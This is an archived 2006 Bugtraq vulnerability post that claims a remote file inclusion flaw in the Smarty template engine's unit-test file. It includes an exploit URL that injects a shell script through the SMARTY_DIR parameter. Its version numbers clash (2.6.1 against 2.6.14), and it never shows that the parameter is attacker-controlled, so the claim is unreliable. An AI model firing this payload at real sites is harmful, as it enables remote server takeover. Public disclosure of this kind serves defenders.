lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061023163007.4788.qmail@securityfocus.com> Date: 23 Oct 2006 16:30:07 -0000 From: crackers_child@...ersavascilar.com To: bugtraq@...urityfocus.com Subject: Smarty-2.6.1 Remote File Include Vulnerabilities !!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!! -------------------------------------------------------------------------------- Title : Smarty-2.6.1 Remote File Include Vulnerabilities -------------------------------------------------------------------------------- #Author: Crackers_Child #cont@ct: crackers_child@...ersavascilar.com -------------------------------------------------------------------------------- ------------------------- ------------------------------------------------------- Application Download : http://smarty.php.net/do_download.php?download_file=Smarty-2.6.14.tar.gz -------------------------------------------------------------------------------- Bug İn test_cases.php <?php require_once './config.php'; require_once SMARTY_DIR . 'Smarty.class.php'; require_once 'PHPUnit.php'; -------------------------------------------------------------------------------- Exploit: http://www.site.com/Smarty-2.6.14/unit_test/test_cases.php?SMARTY_DIR=Sh3ll? -------------------------------------------------------------------------------- greets: X_ALPEREN_X and All SiberSavascilar.CoM Members ! -------------------------------------------------------------------------------- --------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------